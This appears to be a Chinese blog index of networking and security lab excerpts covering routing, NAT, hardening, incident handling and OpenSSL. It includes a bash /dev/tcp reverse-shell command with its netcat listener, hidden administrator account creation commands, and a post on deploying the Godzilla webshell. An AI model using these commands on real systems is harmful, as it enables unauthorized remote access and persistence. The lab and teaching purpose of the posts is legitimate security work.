- 博客(39)
- 收藏
- 关注
RSS订阅
1原创 GRE 基本配置(通用路由封装协议)
简介通用路由封装 (GRE)定义了在任意一种网络层协议上封装任意一个其它网络层协议的协议。在大多数常规情况下,系统拥有一个有效载荷(或负载)包,需要将它封装并发送至某个目的地。首先将有效载荷封装在一个GRE 包中,然后将此GRE 包封装在其它某协议中并进行转发。此外发协议即为发送协议。当IPv4 被作为GRE 有效载荷传输时,协议类型字段必须被设置为0x800。当一个隧道终点拆封此含有 IPv4 包作为有效载荷的GRE 包时,IPv4 包头中的目的地址必须用来转发包,并且需要减少有效载荷包的TTL。值得
2022-01-04 17:59:00
855
原创 NAT—动态nat
原理动态NAT:静态NAT严格地一对一进行地址映射,这就导致即便内网主机长时间离线或者不发送数据时,与之对应的公有地址也处于使用状态。为了避免地址浪费,动态NAT提出了地址池的概念:所有可用的公有地垃组成地址池。当内部主机访问外部网络时临时分配一个地址池中未使用的地址,并将该地址标记为“In use”。当该主机不再访问外部网络时回收分配的地址,重新标记为“Not Uso".。实验拓扑实验步骤AR1<Huawei>sys[Huawei]un in en.
2021-12-23 20:54:46
2816
原创 NAT—静态nat
原理静态NAT∶每个私有地址都有一个与之对应并且固定的公有地址,即私有地址和公有地址之间的关系是一对一映射。·支持双向互访∶私有地址访问Internet经过出口设备NAT转换时,会被转换成对应的公有地址。同时,外部网络访问内部网络时,其报文中携带的公有地址〈目的地址)也会被NAT设备转换成对应的私有地址。通过手动设置,使 Internet 客户进行的通信能够映射到某个特定的私有网络地址和端口。如果想让连接在 Internet 上的计算机能够使用某个私有网络上的服务器(如网站服务器)以及应用
2021-12-23 20:45:39
1793
原创 NAT—nat server
作用nat server功能使得内部服务器可以供外部网络访问。**外部网络的用户访问内部服务器时,nat将请求报文的目的地址转换成内部服务器的私有地址。对内部服务器回应报文而言,nat还会自动将回应报文的源地址(私网地址)转换成公网地址。实验拓扑AR1<Huawei>sys[Huawei]un in en[Huawei]sys AR1[AR1]int g0/0/0[AR1-GigabitEthernet0/0/0][AR1-GigabitEthernet0/0
2021-12-23 20:27:33
4755
原创 单臂路由基础实验
单臂路由原理是指在路由器的一个接口上通过配置子接口(并不存在的物理接口)的方式,实现原来相互隔离的不同VLAN之间的互联互通。路由器的物理接口可以被划分成多个逻辑接口,这些被划分后的逻辑接口被形象的称为子接口。值得注意的是这些逻辑子接口不能被单独的开启或关闭,也就是说,当物理接口被开启或关闭时,所有的该接口的子接口也随之被开启或关闭。实验拓扑...
2021-12-23 20:16:15
99
原创 ACL基础实验
ACL简介访问控制列表ACL(Access Control List)是由一系列规则组成的集合,ACL通过这些规则对报文进行分类,从而使设备可以对不同类报文进行不同的处理。网络中的设备相互通信时,需要保障网络传输的安全可靠和性能稳定。例如:1、防止对网络的攻击,例如IP(Internet Protocol)报文、TCP(Transmission Control Protocol)报文、ICMP(Internet Control Message Protocol)报文的攻击。2、对网络访问行
2021-12-23 19:42:07
3017
原创 交换机工作原理
MAC地址表在交换机内部有一个MAC地址表,这个地址表标明了MAC地址和交换机端口的对应关系。当交换机从某个端口收到一个数据包,它首先读取包头中的源MAC地址,这样它就知道源MAC地址的机器是连在哪个端口上的,它再去读取包头中的目的MAC地址,并在地址表中查找相应的端口。 如果表中有与这目的MAC地址对应的端口,则把数据包直接复制到这端口上,如果在表中找不到相应的端口则把数据包广播到所有端口上,当目的机器对源机器回应时,交换机又可以学习一目的MAC地址与哪个端口对应。交换机转发过程当交换
2021-12-23 15:15:57
684
原创 同vlan间互通
实验拓扑实验步骤<Huawei>sys[Huawei]sys sw1[sw1]vlan batch 10 20[sw1]int e0/0/1[sw1-Ethernet0/0/1]port link-type access [sw1-Ethernet0/0/1]port default vlan 10[sw1-Ethernet0/0/1]int e0/0/2[sw1-Ethernet0/0/2]port link-type access [sw1-Ethernet0/
2021-12-22 20:30:10
128
原创 OSPF动态路由基础实验
实验拓扑ospf基本概念区域划分:area0为骨干区域,其他area1、area2都为普通区域/常规区域。普通区域必须和骨干区域直接相连。 ABR:区域边界路由器。R2、R3位于两个区域的中间,我们称之为区域边界路由器 ;ABR用来链接骨干区域和普通区域。 ASBR :自制系统边界路由器。进行了重新分布操作的路由器。例如上图中的R5链接着两个自制系统,我们把R5称作自制系统边界路由器,自制系统边界路由器用来链接ospf的AS与外部其他的路由。 route id:表示ospf的路由器身份I.
2021-12-22 19:59:52
1812
原创 静态路由配置
pc配置配置命令R1<Huawei>sys[Huawei]sys r1[r1][r1]undo info enable //关闭信息中心[r1]int g0/0/0 //进入端口 [r1-GigabitEthernet0/0/0]ip add 192.168.1.2 30 //配置端口ip[r1]int g0/0/2[r1-GigabitEthernet0/0/2]ip...
2021-12-21 19:36:53
489
原创 TCP/IP协议栈模型分析
OSI七层模型与TCP/IP协议栈模型对应关系一、OSI七层模型OSI七层协议模型主要是:应用层(Application)、表示层(Presentation)、会话层(Session)、传输层(Transport)、网络层(Network)、数据链路层(Data Link)、物理层(Physical)。二、TCP/IP四层模型TCP/IP是一个四层的体系结构,主要包括:应用层、运输层、网际层和网络接口层。从实质上讲,只有上边三层,网络接口层没有什么具体的内容。三、五层体系结构
2021-12-20 19:28:27
177
原创 浏览器劫持事件处置
一、观察劫持现象点击IE浏览器二、尝试手动恢复浏览器首页打开IE设置,选择Internet选项关闭IE浏览器再次打开IE浏览器,首页依然被劫持。三、检查系统驱动1、使用微软套件autoruns工具打开桌面tools文件夹,打开autoruns64.exe同意申明autoruns打开后会列出系统所有的开机加载项。重点关注红色项、黄色项,或签名有问题的项如图,红框,标注的部分,显示为(Not verifiedt)Micros...
2021-12-15 20:58:19
719
原创 Windows隐藏账户处置
实验步骤一、使用命令行创建用户1、打开命令行2、新建test$用户net user test$ sxf!7890 /addnet localgroup administrators test$ /add二、观察test$用户1、使用系统计算机管理工具可以看到test$用户2、使用命令行查看用户在命令行输入net user无法看到test$用户三、导出test$和administrator用户注册表信息1、打开注册表命...
2021-12-15 19:03:44
846
原创 基线管理之MariaDB安全配置
实验目的MariaDB的安全配置过程与配置方法,掌握数据库安全配置对安全运维至关重要。实验环境一台Centos7 已安装MariaDB数据库实验原理通过配置文件与数据库的配置,实现MariaDB安全配置实验步骤一、操作系统级权限检查1、检查数据库的运行权限,不建议以root运行数据库,防止越权攻击ps -ef | egrep "^mysql.*$"如图显示mysqld的运行用户为mysql2、禁用mariadb的历史记录功能查找缓存文件..
2021-12-14 17:15:08
106
原创 基线管理之apache安全配置
实验目的理解apache安全配置项的作用,掌握安全配置项的配置方法实验环境一台Centos 7.2服务器,已安装apache httpd ,并开机自启动。实验原理通过编辑apache配置文件实现apache的安全配置,apache默认配置文件路径是/etc/httpd/conf/httpd.conf实验步骤一、确保apache无法访问根目录查看apache配置文件,确定里面对根目录是拒绝所有请求vim /etc/httpd/conf/httpd.conf.
2021-12-13 21:00:48
2491
原创 基线管理之Centos安全配置
实验目的通过配置Centos配置文件,加强Centos默认安全配置。同时也是理解linux一切皆文件的思想。尝试用shell脚本来处置Centos的安全配置。实验环境一台Centos 7.2 无需其他环境。实验原理Linux操作系统的配置基本上以配置文件展示,通过不同配置文件理解不同的配置。实验步骤一、网络配置1、检查不用的连接使用以下命令ip link show up如下图,发现有两个连接一个为lo,一个为eth0,如果有需要关闭的接口,可以使..
2021-12-13 19:43:35
130
原创 基线管理之Windows安全配置
实验目的理解windows安全配置选项,掌握Windows组策略配置,理解Windows安全配置检查工具的应用。实验环境一台windows server 2012 R2实验原理windows通过组策略展示了详细的操作系统配置,通过配置组策略,将设置保存于windoows注册表,以便操作系统加载各项配置。实验步骤一、登录服务器,打开组策略开始–运行输入gpedit.msc,点确定二、账户策略配置1、密码策略依次如图展开,密码策略,...
2021-12-13 18:53:24
125
原创 windows系统加固
账户默认账户安全禁用Guest账户。 禁用或删除其他无用账户(建议先禁用账户三个月,待确认没有问题后删除。思考:1、为什么要禁用Guest用户?2、为什么禁用或删除其他无用账户?3、为什么建议先禁用账户三个月,待确认没有问题后删除1.Guest账户为临时账户,但是该账户允许用户登录到网络、浏览internet以及关闭计算机。黑客可以通过guest用户提权到administrator组得到管理员权限,进行后渗透。2防止提权3因为直接删除,有些正常用户就无法使.
2021-12-12 20:15:34
630
原创 win7永恒之蓝漏洞修复方案
1、为计算机安装最新的安全补丁,网址为Microsoft 安全公告 MS17-010 - 严重 | Microsoft Docs。2.开启防火墙打开控制面板,点击系统和安全,找到防火墙,打开防火墙3.关闭445端口WIN+R 运行--regedit找到注册表项“HKEY_LOCAL_MACHINE\System\Controlset\Services\NetBT\Parameters”选择“Parameters”项,右键单击,选择“新建”——“DWORD值”。(64位..
2021-12-12 18:44:50
4327
原创 Windows测评
netplwiz 找到用户,此电脑右键管理gpedit.msc //本地组策略远程管理,需要采用带加密管理的远程管理方式。本地策略编辑器 (gpedit.msc)→本地计算机策略→计算机配置→管理模版→ windows组件 →远程桌面服务→远程桌面会话主机→安全,该项中的相关项目进行配置。lusrmgr.msc,查看“用户”中的相关项目secpol.msc 本地安全策略...
2021-12-08 20:06:26
415
原创 Windows DOS命令基础
Win+r 输入cmd 跳出来dos系统界面Dir 列出所有文件Dir /a 显示出全部目录dir//显示当前目录中的子文件夹与文件Dir /a //显示隐藏文件例:dir /b//只显示当前目录中的子文件夹与文件的文件名cd 进入某一个目录cd .. 返回上一个目录文件夹有空格,需要双引号没有空格,不需要引号切换到其它盘符D:或者D盘输入cmd,然后回车Md 文件夹名...
2021-12-08 19:51:19
309
原创 Linux主机系统加固
账号和口令禁用或删除无用账号减少系统无用账号,降低安全风险。操作步骤cat /etc/shadow 查看有多少账户 使用命令 userdel <用户名> 删除不必要的账号。 使用命令 passwd -l <用户名> 锁定不必要的账号。 使用命令 passwd -u <用户名> 解锁必要的账号。检查特殊账号检查是否存在空口令和root权限的账号。操作步骤查看空口令和root权限账号,确认是否存在异常账号: ...
2021-12-07 20:34:06
124
原创 apache部署https
实验目的掌握apache部署自定义证书的https服务器方法实验拓扑实验环境一台Centos 7.2 已经安装openssl组件,已安装apache httpd一台windows 10客户端,已安装chrome浏览器实验原理openssl是Linux内置的一款开源工具,实现了常见的密码算法与应用。通过openssl操作,完成各种密码算法的应用。实验步骤一、生成独立的CA1、 生成ca的keyopenssl genrsa -des3 -out ca.k
2021-12-07 19:33:58
131
原创 OPENSSL基础使用
实验目的掌握常见的密码学算法应用,包含des aes md5 rsa等实验环境一台Centos 7.2 已经安装openssl组件实验原理openssl是Linux内置的一款开源工具,实现了常见的密码算法与应用。通过openssl操作,完成各种密码算法的应用。实验步骤创建一个文件,用于被加密,文件内容为12345,文件名为test.txtecho 12345 >test.txt一、对称加密1、使用rc4加解密加密openssl ..
2021-12-06 20:25:11
3378
原创 使用密钥登录SSH服务器
实验拓扑实验环境两台centos服务器,一台作为ssh服务器,一台ssh客户端,使用密钥连接ssh服务器.实验步骤一、配置服务器SSH密钥登录以下操作使用服务器进行1、编辑SSH配置文件vim /etc/ssh/sshd_config2、删除#号删除PubkeyAuthentication yes此行前面的#号保存文件并退出3、重启ssh服务systemctl restart sshd二、使用客户端生成密钥以下操作使用客户...
2021-12-06 19:57:34
361
原创 windows中设置php环境变量
1.我的电脑-》右键(选择我的属性)2.点击高级设置3.点击环境变量4.在系统变量中找到Path 点击5.找到php.exe的文件目录,添加到path中6.php -v 显示版本,表示成功
2021-11-30 20:11:51
1025
原创 哥斯拉Godzilla webshell
简单使用方法在哥斯拉安装之前,你需要安装jdk1.8的环境。双击Godzilla.jar打开,此时会在同目录下生成data.db数据库存放数据。首页长这样点击管理–添加生成所需的webshell,哥斯拉支持jsp、php、aspx等多种载荷,java和c#的载荷原生实现AES加密,PHP使用亦或加密。生成时需要记住自己的生成配置用以链接时用。以php为例,填写密码和密钥,生成123.php。本文以tomcat7来演示一些功能。将shell.jsp放入tomcat使用哥斯...
2021-11-26 19:49:16
2057
原创 linux反弹shell
0x01. bash在攻击主机上执行端口监听:nc -lvvp port //port 为攻击主机端口号,并且此端口号没有被占用在目标主机上执行: bash -i >& /dev/tcp/攻击主机ip/port 0>&1 //port 为攻击主机端口号解释:bash -i 打开一个交互的bash>& 将标准错误输出重定向到标准输出/dev/tcp/x.x...
2021-11-26 19:33:15
2404
原创 Linux之sed与awk
sedsed介绍什么是sed? Sed是一个流处理编辑器,它能帮助我们自动处理文件、分析日志文件、修改配置文件等。 stream Editor文本流编辑,sed是一个“非交互式的”面向字符流的编辑器。能同时处理多个文件多行的内容 可以不对原文件改动,把整个文件输出到屏幕可以把匹配到的内容输出到屏幕上 还可以对原文件改动,但是不会再屏幕上返回结果sed 参数sed [-hnV] [-e<script>] [-f<script文件>] [文本文件]-e
2021-11-25 20:57:57
546
原创 宝塔搭建网站
安装宝塔面板首先我们要进入虚拟机centos7,在命令行输入以下命令安装宝塔面板yum install -y wget && wget -O install.sh http://download.bt.cn/install/install_6.0.sh && sh install.sh等待安装完成之后,命令行会显示面板的登录地址、账号以及密码,一定将这些信息保存下来,后期的管理都需要使用该信息登录面板安装网站环境宝塔面板安装完成后,我们就可以登...
2021-11-25 19:51:42
527
原创 LAMP网站架构
LAMP定义基本定义LAMP是指一组通常一起使用来运行动态网站或者服务器的自由软件名称首字母缩写Linux,操作系统,Apache,网页服务器MariaDB或MySQL,数据库管理系统(或者数据库服务器)PHP、 Perl或Python,脚本语言原理虽然这些开放源代码程序本身并不是专门设计成同另几个程序一起工作的,但由于它们的廉价和普遍,这个组合开始流行(大多数Linux发行版本捆绑了这些软件)。当一起使用的时候,它们表现的像一个具有活力的“解决方案包”(Solutio
2021-11-25 19:09:21
87
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人